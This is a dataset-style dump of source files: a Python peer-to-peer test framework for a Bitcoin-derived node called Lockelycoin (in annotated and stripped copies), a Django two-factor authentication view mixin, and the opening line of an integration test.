        self.magic_bytes = MAGIC_BYTES[net]
        logger.debug('Connecting to Lockelycoin Node: %s:%d' % (self.dstaddr, self.dstport))

        loop = NetworkThread.network_event_loop
        conn_gen_unsafe = loop.create_connection(lambda: self, host=self.dstaddr, port=self.dstport)
        # Return a callable that schedules the connection on the network
        # thread's event loop; the caller decides when to fire it.
        conn_gen = lambda: loop.call_soon_threadsafe(loop.create_task, conn_gen_unsafe)
        return conn_gen

    def peer_disconnect(self):
        # Connection could have already been closed by other end.
        NetworkThread.network_event_loop.call_soon_threadsafe(lambda: self._transport and self._transport.abort())

    # Connection and disconnection methods

    def connection_made(self, transport):
        """asyncio callback when a connection is opened."""
        assert not self._transport
        logger.debug("Connected & Listening: %s:%d" % (self.dstaddr, self.dstport))
        self._transport = transport
        if self.on_connection_send_msg:
            self.send_message(self.on_connection_send_msg)
            self.on_connection_send_msg = None  # Never used again
        self.on_open()

    def connection_lost(self, exc):
        """asyncio callback when a connection is closed."""
        if exc:
            logger.warning("Connection lost to {}:{} due to {}".format(self.dstaddr, self.dstport, exc))
        else:
            logger.debug("Closed connection to: %s:%d" % (self.dstaddr, self.dstport))
        self._transport = None
        self.recvbuf = b""
        self.on_close()

    # Socket read methods

    def data_received(self, t):
        """asyncio callback when data is read from the socket."""
        if len(t) > 0:
            self.recvbuf += t
            self._on_data()

    def _on_data(self):
        """Try to read P2P messages from the recv buffer.

        This method reads data from the buffer in a loop. It deserializes,
        parses and verifies the P2P header, then passes the P2P payload to
        the on_message callback for processing."""
        try:
            while True:
                if len(self.recvbuf) < 4:
                    return
                if self.recvbuf[:4] != self.magic_bytes:
                    raise ValueError("got garbage %s" % repr(self.recvbuf))
                # Header layout: 4 magic + 12 command + 4 length + 4 checksum.
                if len(self.recvbuf) < 4 + 12 + 4 + 4:
                    return
                command = self.recvbuf[4:4+12].split(b"\x00", 1)[0]
                msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0]
                checksum = self.recvbuf[4+12+4:4+12+4+4]
                if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen:
                    return
                msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen]
                # Checksum is the first 4 bytes of double-SHA256 of the payload.
                th = sha256(msg)
                h = sha256(th)
                if checksum != h[:4]:
                    raise ValueError("got bad checksum " + repr(self.recvbuf))
                self.recvbuf = self.recvbuf[4+12+4+4+msglen:]
                if command not in MESSAGEMAP:
                    raise ValueError("Received unknown command from %s:%d: '%s' %s" % (self.dstaddr, self.dstport, command, repr(msg)))
                f = BytesIO(msg)
                t = MESSAGEMAP[command]()
                t.deserialize(f)
                self._log_message("receive", t)
                self.on_message(t)
        except Exception as e:
            # Bug fix: the original called
            #   logger.exception('Error reading message:', repr(e))
            # passing repr(e) as a %-format argument to a format string with
            # no placeholder, which makes the logging module raise a
            # formatting error at render time and masks the real failure.
            logger.exception('Error reading message: %s', repr(e))
            raise

    def on_message(self, message):
        """Callback for processing a P2P payload. Must be overridden by derived class."""
        raise NotImplementedError

    # Socket write methods

    def send_message(self, message):
        """Send a P2P message over the socket.

        This method takes a P2P payload, builds the P2P header and adds
        the message to the send buffer to be sent over the socket."""
        tmsg = self.build_message(message)
        self._log_message("send", message)
        return self.send_raw_message(tmsg)

    def send_raw_message(self, raw_message_bytes):
        if not self.is_connected:
            raise IOError('Not connected')

        def maybe_write():
            if not self._transport:
                return
            # Python <3.4.4 does not have is_closing, so we have to check for
            # its existence explicitly as long as Bitcoin Core supports all
            # Python 3.4 versions.
            if hasattr(self._transport, 'is_closing') and self._transport.is_closing():
                return
            self._transport.write(raw_message_bytes)
        NetworkThread.network_event_loop.call_soon_threadsafe(maybe_write)

    # Class utility methods

    def build_message(self, message):
        """Build a serialized P2P message"""
        command = message.command
        data = message.serialize()
        tmsg = self.magic_bytes
        tmsg += command
        tmsg += b"\x00" * (12 - len(command))
        tmsg += struct.pack("<I", len(data))
        th = sha256(data)
        h = sha256(th)
        tmsg += h[:4]
        tmsg += data
        return tmsg

    def _log_message(self, direction, msg):
        """Logs a message being sent or received over the connection."""
        if direction == "send":
            log_message = "Send message to "
        elif direction == "receive":
            log_message = "Received message from "
        log_message += "%s:%d: %s" % (self.dstaddr, self.dstport, repr(msg)[:500])
        if len(log_message) > 500:
            log_message += "... (msg truncated)"
        logger.debug(log_message)
class P2PInterface(P2PConnection):
"""A high-level P2P interface class for communicating with a Lockelycoin node.
This class provides high-level callbacks for processing P2P message
payloads, as well as convenience methods for interacting with the
node over P2P.
Individual testcases should subclass this and override the on_* methods
if they want to alter message handling behaviour."""
def __init__(self):
super().__init__()
# Track number of messages of each type received and the most recent
# message of each type
self.message_count = defaultdict(int)
self.last_message = {}
# A count of the number of ping messages we've sent to the node
self.ping_counter = 1
# The network services received from the peer
self.nServices = 0
def peer_connect(self, *args, services=NODE_NETWORK|NODE_WITNESS, send_version=True, **kwargs):
create_conn = super().peer_connect(*args, **kwargs)
if send_version:
# Send a version msg
vt = msg_version()
vt.nServices = services
vt.addrTo.ip = self.dstaddr
vt.addrTo.port = self.dstport
vt.addrFrom.ip = "0.0.0.0"
vt.addrFrom.port = 0
self.on_connection_send_msg = vt # Will be sent soon after connection_made
return create_conn
# Message receiving methods
def on_message(self, message):
"""Receive message and dispatch message to appropriate callback.
We keep a count of how many of each message type has been received
and the most recent message of each type."""
with mininode_lock:
try:
command = message.command.decode('ascii')
self.message_count[command] += 1
self.last_message[command] = message
getattr(self, 'on_' + command)(message)
except:
print("ERROR delivering %s (%s)" % (repr(message), sys.exc_info()[0]))
raise
# Callback methods. Can be overridden by subclasses in individual test
# cases to provide custom message handling behaviour.
def on_open(self):
pass
def on_close(self):
pass
def on_addr(self, message): pass
def on_block(self, message): pass
def on_blocktxn(self, message): pass
def on_cmpctblock(self, message): pass
def on_feefilter(self, message): pass
def on_getaddr(self, message): pass
def on_getblocks(self, message): pass
def on_getblocktxn(self, message): pass
def on_getdata(self, message): pass
def on_getheaders(self, message): pass
def on_headers(self, message): pass
def on_mempool(self, message): pass
def on_notfound(self, message): pass
def on_pong(self, message): pass
def on_reject(self, message): pass
def on_sendcmpct(self, message): pass
def on_sendheaders(self, message): pass
def on_tx(self, message): pass
def on_inv(self, message):
want = msg_getdata()
for i in message.inv:
if i.type != 0:
want.inv.append(i)
if len(want.inv):
self.send_message(want)
def on_ping(self, message):
self.send_message(msg_pong(message.nonce))
def on_verack(self, message):
pass
def on_version(self, message):
assert message.nVersion >= MIN_VERSION_SUPPORTED, "Version {} received. Test framework only supports versions greater than {}".format(message.nVersion, MIN_VERSION_SUPPORTED)
self.send_message(msg_verack())
self.nServices = message.nServices
# Connection helper methods
def wait_for_disconnect(self, timeout=60):
test_function = lambda: not self.is_connected
wait_until(test_function, timeout=timeout, lock=mininode_lock)
# Message receiving helper methods
def wait_for_tx(self, txid, timeout=60):
def test_function():
if not self.last_message.get('tx'):
return False
return self.last_message['tx'].tx.rehash() == txid
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_block(self, blockhash, timeout=60):
test_function = lambda: self.last_message.get("block") and self.last_message["block"].block.rehash() == blockhash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_header(self, blockhash, timeout=60):
def test_function():
last_headers = self.last_message.get('headers')
if not last_headers:
return False
return last_headers.headers[0].rehash() == blockhash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_getdata(self, timeout=60):
"""Waits for a getdata message.
Receiving any getdata message will satisfy the predicate. the last_message["getdata"]
value must be explicitly cleared before calling this method, or this will return
immediately with success. TODO: change this method to take a hash value and only
return true if the correct block/tx has been requested."""
test_function = lambda: self.last_message.get("getdata")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_getheaders(self, timeout=60):
"""Waits for a getheaders message.
Receiving any getheaders message will satisfy the predicate. the last_message["getheaders"]
value must be explicitly cleared before calling this method, or this will return
immediately with success. TODO: change this method to take a hash value and only
return true if the correct block header has been requested."""
test_function = lambda: self.last_message.get("getheaders")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_inv(self, expected_inv, timeout=60):
"""Waits for an INV message and checks that the first inv object in the message was as expected."""
if len(expected_inv) > 1:
raise NotImplementedError("wait_for_inv() will only verify the first inv object")
test_function = lambda: self.last_message.get("inv") and \
self.last_message["inv"].inv[0].type == expected_inv[0].type and \
self.last_message["inv"].inv[0].hash == expected_inv[0].hash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_verack(self, timeout=60):
test_function = lambda: self.message_count["verack"]
wait_until(test_function, timeout=timeout, lock=mininode_lock)
# Message sending helper functions
def send_and_ping(self, message, timeout=60):
self.send_message(message)
self.sync_with_ping(timeout=timeout)
# Sync up with the node
def sync_with_ping(self, timeout=60):
self.send_message(msg_ping(nonce=self.ping_counter))
test_function = lambda: self.last_message.get("pong") and self.last_message["pong"].nonce == self.ping_counter
wait_until(test_function, timeout=timeout, lock=mininode_lock)
self.ping_counter += 1
# One lock for synchronizing all data access between the network event loop (see
# NetworkThread below) and the thread running the test logic. For simplicity,
# P2PConnection acquires this lock whenever delivering a message to a P2PInterface.
# This lock should be acquired in the thread running the test logic to synchronize
# access to any data shared with the P2PInterface or P2PConnection.
mininode_lock = threading.RLock()
class NetworkThread(threading.Thread):
network_event_loop = None
def __init__(self):
super().__init__(name="NetworkThread")
# There is only one event loop and no more than one thread must be created
assert not self.network_event_loop
NetworkThread.network_event_loop = asyncio.new_event_loop()
def run(self):
"""Start the network thread."""
self.network_event_loop.run_forever()
def close(self, timeout=10):
"""Close the connections and network event loop."""
self.network_event_loop.call_soon_threadsafe(self.network_event_loop.stop)
wait_until(lambda: not self.network_event_loop.is_running(), timeout=timeout)
self.network_event_loop.close()
self.join(timeout)
class P2PDataStore(P2PInterface):
"""A P2P data store class.
Keeps a block and transaction store and responds correctly to getdata and getheaders requests."""
def __init__(self):
super().__init__()
# store of blocks. key is block hash, value is a CBlock object
self.block_store = {}
self.last_block_hash = ''
# store of txs. key is txid, value is a CTransaction object
self.tx_store = {}
self.getdata_requests = []
def on_getdata(self, message):
"""Check for the tx/block in our stores and if found, reply with an inv message."""
for inv in message.inv:
self.getdata_requests.append(inv.hash)
if (inv.type & MSG_TYPE_MASK) == MSG_TX and inv.hash in self.tx_store.keys():
self.send_message(msg_tx(self.tx_store[inv.hash]))
elif (inv.type & MSG_TYPE_MASK) == MSG_BLOCK and inv.hash in self.block_store.keys():
self.send_message(msg_block(self.block_store[inv.hash]))
else:
logger.debug('getdata message type {} received.'.format(hex(inv.type)))
def on_getheaders(self, message):
"""Search back through our block store for the locator, and reply with a headers message if found."""
locator, hash_stop = message.locator, message.hashstop
# Assume that the most recent block added is the tip
if not self.block_store:
return
headers_list = [self.block_store[self.last_block_hash]]
maxheaders = 2000
while headers_list[-1].sha256 not in locator.vHave:
# Walk back through the block store, adding headers to headers_list
# as we go.
prev_block_hash = headers_list[-1].hashPrevBlock
if prev_block_hash in self.block_store:
prev_block_header = CBlockHeader(self.block_store[prev_block_hash])
headers_list.append(prev_block_header)
if prev_block_header.sha256 == hash_stop:
# if this is the hashstop header, stop here
break
else:
logger.debug('block hash {} not found in block store'.format(hex(prev_block_hash)))
break
# Truncate the list if there are too many headers
headers_list = headers_list[:-maxheaders - 1:-1]
response = msg_headers(headers_list)
if response is not None:
self.send_message(response)
def send_blocks_and_test(self, blocks, node, *, success=True, force_send=False, reject_reason=None, expect_disconnect=False, timeout=60):
"""Send blocks to test node and test whether the tip advances.
- add all blocks to our block_store
- send a headers message for the final block
- the on_getheaders handler will ensure that any getheaders are responded to
- if force_send is False: wait for getdata for each of the blocks. The on_getdata handler will
ensure that any getdata messages are responded to. Otherwise send the full block unsolicited.
- if success is True: assert that the node's tip advances to the most recent block
- if success is False: assert that the node's tip doesn't advance
- if reject_reason is set: assert that the correct reject message is logged"""
with mininode_lock:
for block in blocks:
self.block_store[block.sha256] = block
self.last_block_hash = block.sha256
reject_reason = [reject_reason] if reject_reason else []
with node.assert_debug_log(expected_msgs=reject_reason):
if force_send:
for b in blocks:
self.send_message(msg_block(block=b))
else:
self.send_message(msg_headers([CBlockHeader(blocks[-1])]))
wait_until(lambda: blocks[-1].sha256 in self.getdata_requests, timeout=timeout, lock=mininode_lock)
if expect_disconnect:
self.wait_for_disconnect(timeout=timeout)
else:
self.sync_with_ping(timeout=timeout)
if success:
wait_until(lambda: node.getbestblockhash() == blocks[-1].hash, timeout=timeout)
else:
assert node.getbestblockhash() != blocks[-1].hash
def send_txs_and_test(self, txs, node, *, success=True, expect_disconnect=False, reject_reason=None):
"""Send txs to test node and test whether they're accepted to the mempool.
- add all txs to our tx_store
- send tx messages for all txs
- if success is True/False: assert that the txs are/are not accepted to the mempool
- if expect_disconnect is True: Skip the sync with ping
- if reject_reason is set: assert that the correct reject message is logged."""
with mininode_lock:
for tx in txs:
self.tx_store[tx.sha256] = tx
reject_reason = [reject_reason] if reject_reason else []
with node.assert_debug_log(expected_msgs=reject_reason):
for tx in txs:
self.send_message(msg_tx(tx))
if expect_disconnect:
self.wait_for_disconnect()
else:
self.sync_with_ping()
raw_mempool = node.getrawmempool()
if success:
# Check that all txs are now in the mempool
for tx in txs:
assert tx.hash in raw_mempool, "{} not found in mempool".format(tx.hash)
else:
# Check that none of the txs are now in the mempool
for tx in txs:
assert tx.hash not in raw_mempool, "{} tx found in mempool".format(tx.hash)
| 39.362712 | 182 | 0.645065 |
import asyncio
from collections import defaultdict
from io import BytesIO
import logging
import struct
import sys
import threading
from test_framework.messages import (
CBlockHeader,
MIN_VERSION_SUPPORTED,
msg_addr,
msg_block,
MSG_BLOCK,
msg_blocktxn,
msg_cmpctblock,
msg_feefilter,
msg_getaddr,
msg_getblocks,
msg_getblocktxn,
msg_getdata,
msg_getheaders,
msg_headers,
msg_inv,
msg_mempool,
msg_notfound,
msg_ping,
msg_pong,
msg_reject,
msg_sendcmpct,
msg_sendheaders,
msg_tx,
MSG_TX,
MSG_TYPE_MASK,
msg_verack,
msg_version,
NODE_NETWORK,
NODE_WITNESS,
sha256,
)
from test_framework.util import wait_until
logger = logging.getLogger("TestFramework.mininode")
MESSAGEMAP = {
b"addr": msg_addr,
b"block": msg_block,
b"blocktxn": msg_blocktxn,
b"cmpctblock": msg_cmpctblock,
b"feefilter": msg_feefilter,
b"getaddr": msg_getaddr,
b"getblocks": msg_getblocks,
b"getblocktxn": msg_getblocktxn,
b"getdata": msg_getdata,
b"getheaders": msg_getheaders,
b"headers": msg_headers,
b"inv": msg_inv,
b"mempool": msg_mempool,
b"notfound": msg_notfound,
b"ping": msg_ping,
b"pong": msg_pong,
b"reject": msg_reject,
b"sendcmpct": msg_sendcmpct,
b"sendheaders": msg_sendheaders,
b"tx": msg_tx,
b"verack": msg_verack,
b"version": msg_version,
}
MAGIC_BYTES = {
"mainnet": b"\xfb\xc0\xb6\xdb",
"testnet4": b"\xfd\xd2\xc8\xf1",
"regtest": b"\xfa\xbf\xb5\xda",
}
class P2PConnection(asyncio.Protocol):
def __init__(self):
self._transport = None
@property
def is_connected(self):
return self._transport is not None
def peer_connect(self, dstaddr, dstport, net="regtest"):
assert not self.is_connected
self.dstaddr = dstaddr
self.dstport = dstport
self.on_connection_send_msg = None
self.recvbuf = b""
self.magic_bytes = MAGIC_BYTES[net]
logger.debug('Connecting to Lockelycoin Node: %s:%d' % (self.dstaddr, self.dstport))
loop = NetworkThread.network_event_loop
conn_gen_unsafe = loop.create_connection(lambda: self, host=self.dstaddr, port=self.dstport)
conn_gen = lambda: loop.call_soon_threadsafe(loop.create_task, conn_gen_unsafe)
return conn_gen
def peer_disconnect(self):
NetworkThread.network_event_loop.call_soon_threadsafe(lambda: self._transport and self._transport.abort())
def connection_made(self, transport):
assert not self._transport
logger.debug("Connected & Listening: %s:%d" % (self.dstaddr, self.dstport))
self._transport = transport
if self.on_connection_send_msg:
self.send_message(self.on_connection_send_msg)
self.on_connection_send_msg = None
self.on_open()
def connection_lost(self, exc):
if exc:
logger.warning("Connection lost to {}:{} due to {}".format(self.dstaddr, self.dstport, exc))
else:
logger.debug("Closed connection to: %s:%d" % (self.dstaddr, self.dstport))
self._transport = None
self.recvbuf = b""
self.on_close()
def data_received(self, t):
if len(t) > 0:
self.recvbuf += t
self._on_data()
def _on_data(self):
try:
while True:
if len(self.recvbuf) < 4:
return
if self.recvbuf[:4] != self.magic_bytes:
raise ValueError("got garbage %s" % repr(self.recvbuf))
if len(self.recvbuf) < 4 + 12 + 4 + 4:
return
command = self.recvbuf[4:4+12].split(b"\x00", 1)[0]
msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0]
checksum = self.recvbuf[4+12+4:4+12+4+4]
if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen:
return
msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen]
th = sha256(msg)
h = sha256(th)
if checksum != h[:4]:
raise ValueError("got bad checksum " + repr(self.recvbuf))
self.recvbuf = self.recvbuf[4+12+4+4+msglen:]
if command not in MESSAGEMAP:
raise ValueError("Received unknown command from %s:%d: '%s' %s" % (self.dstaddr, self.dstport, command, repr(msg)))
f = BytesIO(msg)
t = MESSAGEMAP[command]()
t.deserialize(f)
self._log_message("receive", t)
self.on_message(t)
except Exception as e:
logger.exception('Error reading message:', repr(e))
raise
def on_message(self, message):
raise NotImplementedError
def send_message(self, message):
tmsg = self.build_message(message)
self._log_message("send", message)
return self.send_raw_message(tmsg)
def send_raw_message(self, raw_message_bytes):
if not self.is_connected:
raise IOError('Not connected')
def maybe_write():
if not self._transport:
return
if hasattr(self._transport, 'is_closing') and self._transport.is_closing():
return
self._transport.write(raw_message_bytes)
NetworkThread.network_event_loop.call_soon_threadsafe(maybe_write)
def build_message(self, message):
command = message.command
data = message.serialize()
tmsg = self.magic_bytes
tmsg += command
tmsg += b"\x00" * (12 - len(command))
tmsg += struct.pack("<I", len(data))
th = sha256(data)
h = sha256(th)
tmsg += h[:4]
tmsg += data
return tmsg
def _log_message(self, direction, msg):
if direction == "send":
log_message = "Send message to "
elif direction == "receive":
log_message = "Received message from "
log_message += "%s:%d: %s" % (self.dstaddr, self.dstport, repr(msg)[:500])
if len(log_message) > 500:
log_message += "... (msg truncated)"
logger.debug(log_message)
class P2PInterface(P2PConnection):
def __init__(self):
super().__init__()
self.message_count = defaultdict(int)
self.last_message = {}
self.ping_counter = 1
# The network services received from the peer
self.nServices = 0
def peer_connect(self, *args, services=NODE_NETWORK|NODE_WITNESS, send_version=True, **kwargs):
create_conn = super().peer_connect(*args, **kwargs)
if send_version:
# Send a version msg
vt = msg_version()
vt.nServices = services
vt.addrTo.ip = self.dstaddr
vt.addrTo.port = self.dstport
vt.addrFrom.ip = "0.0.0.0"
vt.addrFrom.port = 0
self.on_connection_send_msg = vt # Will be sent soon after connection_made
return create_conn
# Message receiving methods
def on_message(self, message):
with mininode_lock:
try:
command = message.command.decode('ascii')
self.message_count[command] += 1
self.last_message[command] = message
getattr(self, 'on_' + command)(message)
except:
print("ERROR delivering %s (%s)" % (repr(message), sys.exc_info()[0]))
raise
# Callback methods. Can be overridden by subclasses in individual test
# cases to provide custom message handling behaviour.
def on_open(self):
pass
def on_close(self):
pass
def on_addr(self, message): pass
def on_block(self, message): pass
def on_blocktxn(self, message): pass
def on_cmpctblock(self, message): pass
def on_feefilter(self, message): pass
def on_getaddr(self, message): pass
def on_getblocks(self, message): pass
def on_getblocktxn(self, message): pass
def on_getdata(self, message): pass
def on_getheaders(self, message): pass
def on_headers(self, message): pass
def on_mempool(self, message): pass
def on_notfound(self, message): pass
def on_pong(self, message): pass
def on_reject(self, message): pass
def on_sendcmpct(self, message): pass
def on_sendheaders(self, message): pass
def on_tx(self, message): pass
def on_inv(self, message):
want = msg_getdata()
for i in message.inv:
if i.type != 0:
want.inv.append(i)
if len(want.inv):
self.send_message(want)
def on_ping(self, message):
self.send_message(msg_pong(message.nonce))
def on_verack(self, message):
pass
def on_version(self, message):
assert message.nVersion >= MIN_VERSION_SUPPORTED, "Version {} received. Test framework only supports versions greater than {}".format(message.nVersion, MIN_VERSION_SUPPORTED)
self.send_message(msg_verack())
self.nServices = message.nServices
# Connection helper methods
def wait_for_disconnect(self, timeout=60):
test_function = lambda: not self.is_connected
wait_until(test_function, timeout=timeout, lock=mininode_lock)
# Message receiving helper methods
def wait_for_tx(self, txid, timeout=60):
def test_function():
if not self.last_message.get('tx'):
return False
return self.last_message['tx'].tx.rehash() == txid
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_block(self, blockhash, timeout=60):
test_function = lambda: self.last_message.get("block") and self.last_message["block"].block.rehash() == blockhash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_header(self, blockhash, timeout=60):
def test_function():
last_headers = self.last_message.get('headers')
if not last_headers:
return False
return last_headers.headers[0].rehash() == blockhash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_getdata(self, timeout=60):
test_function = lambda: self.last_message.get("getdata")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_getheaders(self, timeout=60):
test_function = lambda: self.last_message.get("getheaders")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_inv(self, expected_inv, timeout=60):
if len(expected_inv) > 1:
raise NotImplementedError("wait_for_inv() will only verify the first inv object")
test_function = lambda: self.last_message.get("inv") and \
self.last_message["inv"].inv[0].type == expected_inv[0].type and \
self.last_message["inv"].inv[0].hash == expected_inv[0].hash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_verack(self, timeout=60):
test_function = lambda: self.message_count["verack"]
wait_until(test_function, timeout=timeout, lock=mininode_lock)
# Message sending helper functions
def send_and_ping(self, message, timeout=60):
self.send_message(message)
self.sync_with_ping(timeout=timeout)
# Sync up with the node
def sync_with_ping(self, timeout=60):
self.send_message(msg_ping(nonce=self.ping_counter))
test_function = lambda: self.last_message.get("pong") and self.last_message["pong"].nonce == self.ping_counter
wait_until(test_function, timeout=timeout, lock=mininode_lock)
self.ping_counter += 1
# One lock for synchronizing all data access between the network event loop (see
# NetworkThread below) and the thread running the test logic. For simplicity,
# P2PConnection acquires this lock whenever delivering a message to a P2PInterface.
# This lock should be acquired in the thread running the test logic to synchronize
# access to any data shared with the P2PInterface or P2PConnection.
mininode_lock = threading.RLock()
class NetworkThread(threading.Thread):
network_event_loop = None
def __init__(self):
super().__init__(name="NetworkThread")
# There is only one event loop and no more than one thread must be created
assert not self.network_event_loop
NetworkThread.network_event_loop = asyncio.new_event_loop()
def run(self):
self.network_event_loop.run_forever()
def close(self, timeout=10):
self.network_event_loop.call_soon_threadsafe(self.network_event_loop.stop)
wait_until(lambda: not self.network_event_loop.is_running(), timeout=timeout)
self.network_event_loop.close()
self.join(timeout)
class P2PDataStore(P2PInterface):
def __init__(self):
super().__init__()
# store of blocks. key is block hash, value is a CBlock object
self.block_store = {}
self.last_block_hash = ''
# store of txs. key is txid, value is a CTransaction object
self.tx_store = {}
self.getdata_requests = []
def on_getdata(self, message):
for inv in message.inv:
self.getdata_requests.append(inv.hash)
if (inv.type & MSG_TYPE_MASK) == MSG_TX and inv.hash in self.tx_store.keys():
self.send_message(msg_tx(self.tx_store[inv.hash]))
elif (inv.type & MSG_TYPE_MASK) == MSG_BLOCK and inv.hash in self.block_store.keys():
self.send_message(msg_block(self.block_store[inv.hash]))
else:
logger.debug('getdata message type {} received.'.format(hex(inv.type)))
def on_getheaders(self, message):
locator, hash_stop = message.locator, message.hashstop
# Assume that the most recent block added is the tip
if not self.block_store:
return
headers_list = [self.block_store[self.last_block_hash]]
maxheaders = 2000
while headers_list[-1].sha256 not in locator.vHave:
# Walk back through the block store, adding headers to headers_list
# as we go.
prev_block_hash = headers_list[-1].hashPrevBlock
if prev_block_hash in self.block_store:
prev_block_header = CBlockHeader(self.block_store[prev_block_hash])
headers_list.append(prev_block_header)
if prev_block_header.sha256 == hash_stop:
# if this is the hashstop header, stop here
break
else:
logger.debug('block hash {} not found in block store'.format(hex(prev_block_hash)))
break
# Truncate the list if there are too many headers
headers_list = headers_list[:-maxheaders - 1:-1]
response = msg_headers(headers_list)
if response is not None:
self.send_message(response)
def send_blocks_and_test(self, blocks, node, *, success=True, force_send=False, reject_reason=None, expect_disconnect=False, timeout=60):
with mininode_lock:
for block in blocks:
self.block_store[block.sha256] = block
self.last_block_hash = block.sha256
reject_reason = [reject_reason] if reject_reason else []
with node.assert_debug_log(expected_msgs=reject_reason):
if force_send:
for b in blocks:
self.send_message(msg_block(block=b))
else:
self.send_message(msg_headers([CBlockHeader(blocks[-1])]))
wait_until(lambda: blocks[-1].sha256 in self.getdata_requests, timeout=timeout, lock=mininode_lock)
if expect_disconnect:
self.wait_for_disconnect(timeout=timeout)
else:
self.sync_with_ping(timeout=timeout)
if success:
wait_until(lambda: node.getbestblockhash() == blocks[-1].hash, timeout=timeout)
else:
assert node.getbestblockhash() != blocks[-1].hash
def send_txs_and_test(self, txs, node, *, success=True, expect_disconnect=False, reject_reason=None):
with mininode_lock:
for tx in txs:
self.tx_store[tx.sha256] = tx
reject_reason = [reject_reason] if reject_reason else []
with node.assert_debug_log(expected_msgs=reject_reason):
for tx in txs:
self.send_message(msg_tx(tx))
if expect_disconnect:
self.wait_for_disconnect()
else:
self.sync_with_ping()
raw_mempool = node.getrawmempool()
if success:
# Check that all txs are now in the mempool
for tx in txs:
assert tx.hash in raw_mempool, "{} not found in mempool".format(tx.hash)
else:
# Check that none of the txs are now in the mempool
for tx in txs:
assert tx.hash not in raw_mempool, "{} tx found in mempool".format(tx.hash)
| true | true |
f7326e08422672f437abdf740d0fd756aaca9b7e | 2,935 | py | Python | two_factor/views/mixins.py | Bassel2387/django-two-factor-auth | e69d9a7fa289a0289e6fc42f4f9cea632e01132d | [
"MIT"
] | 65 | 2021-12-30T16:58:11.000Z | 2022-03-28T21:36:51.000Z | two_factor/views/mixins.py | Bassel2387/django-two-factor-auth | e69d9a7fa289a0289e6fc42f4f9cea632e01132d | [
"MIT"
] | 68 | 2021-12-29T19:48:40.000Z | 2022-03-31T10:51:12.000Z | two_factor/views/mixins.py | Bassel2387/django-two-factor-auth | e69d9a7fa289a0289e6fc42f4f9cea632e01132d | [
"MIT"
] | 21 | 2021-12-30T16:58:14.000Z | 2022-03-30T07:10:23.000Z | from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.views import redirect_to_login
from django.core.exceptions import PermissionDenied
from django.template.response import TemplateResponse
from django.urls import reverse
from ..utils import default_device
class OTPRequiredMixin:
"""
View mixin which verifies that the user logged in using OTP.
.. note::
This mixin should be the left-most base class.
"""
raise_anonymous = False
"""
Whether to raise PermissionDenied if the user isn't logged in.
"""
login_url = None
"""
If :attr:`raise_anonymous` is set to `False`, this defines where the user
will be redirected to. Defaults to ``two_factor:login``.
"""
redirect_field_name = REDIRECT_FIELD_NAME
"""
URL query name to use for providing the destination URL.
"""
raise_unverified = False
"""
Whether to raise PermissionDenied if the user isn't verified.
"""
verification_url = None
"""
If :attr:`raise_unverified` is set to `False`, this defines where the user
will be redirected to. If set to ``None``, an explanation will be shown to
the user on why access was denied.
"""
def get_login_url(self):
"""
Returns login url to redirect to.
"""
return self.login_url and str(self.login_url) or reverse('two_factor:login')
def get_verification_url(self):
"""
Returns verification url to redirect to.
"""
return self.verification_url and str(self.verification_url)
def dispatch(self, request, *args, **kwargs):
if not request.user or not request.user.is_authenticated or \
(not request.user.is_verified() and default_device(request.user)):
# If the user has not authenticated raise or redirect to the login
# page. Also if the user just enabled two-factor authentication and
# has not yet logged in since should also have the same result. If
# the user receives a 'you need to enable TFA' by now, he gets
# confuses as TFA has just been enabled. So we either raise or
# redirect to the login page.
if self.raise_anonymous:
raise PermissionDenied()
else:
return redirect_to_login(request.get_full_path(), self.get_login_url())
if not request.user.is_verified():
if self.raise_unverified:
raise PermissionDenied()
elif self.get_verification_url():
return redirect_to_login(request.get_full_path(), self.get_verification_url())
else:
return TemplateResponse(
request=request,
template='two_factor/core/otp_required.html',
status=403,
)
return super().dispatch(request, *args, **kwargs)
| 35.361446 | 94 | 0.639864 | from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.views import redirect_to_login
from django.core.exceptions import PermissionDenied
from django.template.response import TemplateResponse
from django.urls import reverse
from ..utils import default_device
class OTPRequiredMixin:
raise_anonymous = False
login_url = None
redirect_field_name = REDIRECT_FIELD_NAME
raise_unverified = False
verification_url = None
def get_login_url(self):
return self.login_url and str(self.login_url) or reverse('two_factor:login')
def get_verification_url(self):
return self.verification_url and str(self.verification_url)
def dispatch(self, request, *args, **kwargs):
if not request.user or not request.user.is_authenticated or \
(not request.user.is_verified() and default_device(request.user)):
if self.raise_anonymous:
raise PermissionDenied()
else:
return redirect_to_login(request.get_full_path(), self.get_login_url())
if not request.user.is_verified():
if self.raise_unverified:
raise PermissionDenied()
elif self.get_verification_url():
return redirect_to_login(request.get_full_path(), self.get_verification_url())
else:
return TemplateResponse(
request=request,
template='two_factor/core/otp_required.html',
status=403,
)
return super().dispatch(request, *args, **kwargs)
| true | true |
f7326f3839bbb8c4d87f6e6f1636403646f0f7c4 | 6,253 | py | Python | integration-test/992-boundaries-min_zoom-and-name.py | nzjony/vector-datasource | 926555904cf44da06380d808fdc16f4b992bde1f | [
"MIT"
] | null | null | null | integration-test/992-boundaries-min_zoom-and-name.py | nzjony/vector-datasource | 926555904cf44da06380d808fdc16f4b992bde1f | [
"MIT"
] | null | null | null | integration-test/992-boundaries-min_zoom-and-name.py | nzjony/vector-datasource | 926555904cf44da06380d808fdc16f4b992bde1f | [
"MIT"
] | null | null | null | from . import FixtureTest
class BoundariesMinZoomAndNameNe(FixtureTest):
